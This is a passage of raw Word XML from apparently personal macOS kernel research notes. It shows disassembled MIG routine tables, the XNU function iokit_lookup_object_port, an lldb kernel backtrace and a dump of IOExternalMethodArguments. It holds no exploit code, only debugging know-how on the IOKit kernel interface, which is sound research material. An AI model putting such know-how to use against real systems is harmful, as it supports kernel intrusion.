      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dq 3                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dq 2C00000000h          ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dd 3B1D70h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dq 7FFFFFF80h           ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A3F20" w:rsidRPr="008A3F20" w:rsidRDefault="008A3F20" w:rsidP="008A3F20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04788                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00E71757" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxxx ()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00E71757" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxxx ()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00E71757" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00180F81" w:rsidRDefault="00180F81" w:rsidP="00180F81">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(kernel)</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:t>iokit_lookup_object_port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1522D" w:rsidRDefault="00B1522D" w:rsidP="005E36D3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00180F81" w:rsidRDefault="00180F81" w:rsidP="005E36D3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00180F81" w:rsidRDefault="00180F81" w:rsidP="005E36D3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00180F81" w:rsidRDefault="00180F81" w:rsidP="00180F81">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> * Lookup a device by its port.</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> * Doesn't consume the naked send right; produces a device reference.</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> */</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MIGEXTERN</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>io_object_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iokit_lookup_object_port</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_port_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </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register</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>io_object_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>obj</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if</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IP_VALID</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</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return</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL</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color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iokit_lock_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</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if</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ip_active</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</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b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ip_kotype</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IKOT_IOKIT_OBJECT</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>obj</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>io_object_t</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ip_kobject</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iokit_add_reference</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>obj</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b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>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else</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>obj</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL</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color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iokit_unlock_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>port</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color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00180F81" w:rsidRDefault="00180F81" w:rsidP="00180F81">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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lldb) bt</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thread #6: tid = 0x0811, 0xffffff800b55593d kernel.development`iokit_lookup_object_port(port=0xffffff801f495970) + 13 at </w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>iokit_rpc.c:148, name = '0xffffff801fac94a8', queue = '0x0', stop reason = breakpoint 5.1</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 frame #0: 0xffffff800b55593d kernel.development`</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>iokit_lookup_object_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>(port=0xffffff801f495970) + 13 at iokit_rpc.c:148</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1: 0xffffff800b556799 kernel.development`_Xio_iterator_next(InHeadP=0xffffff8023f80a9c, OutHeadP=0xffffff80254f3f88) + 57 at device_server.c:678</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2: 0xffffff800b487f73 kernel.development`ipc_kobject_server(request=0xffffff8023f80a00) + 259 at ipc_kobject.c:340</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3: 0xffffff800b463ea3 kernel.development`ipc_kmsg_send(kmsg=&lt;unavailable&gt;, option=&lt;unavailable&gt;, send_timeout=0) + 195 at ipc_kmsg.c:1441</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4: 0xffffff800b47a4c5 kernel.development`mach_msg_overwrite_trap(args=&lt;unavailable&gt;) + 197 at mach_msg.c:470</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5: 0xffffff800b5828e0 kernel.development`mach_call_munger64(state=0xffffff801fc84b20) + 480 at bsd_i386.c:560</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 xml:space="preserve">    frame #6: 0xffffff800b5b85a6 kernel.development`hndl_mach_scall64 + 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00180F81" w:rsidRPr="00180F81" w:rsidRDefault="00180F81" w:rsidP="00180F81">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00180F81">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>(lldb)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004317B7" w:rsidRDefault="00F416BD" w:rsidP="004317B7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="_Toc445313353"/>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o_connect_method</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004317B7" w:rsidRDefault="004317B7" w:rsidP="004317B7"/>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="152" w:name="_Toc445313354"/>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IOExternalMethodArguments</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(lldb) expr -A -T -L -- *(IOExternalMethodArguments*)  $r12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8020: (IOExternalMethodArguments) $0 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8020:   (uint32_t) version = 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8024:   (uint32_t) selector = 7324</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8028:   (mach_port_t) asyncWakePort = 0x0000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8030:   (io_user_reference_t *) asyncReference = 0x0000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0x00007fc841fc8038:   (uint32_t) asyncReferenceCount = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
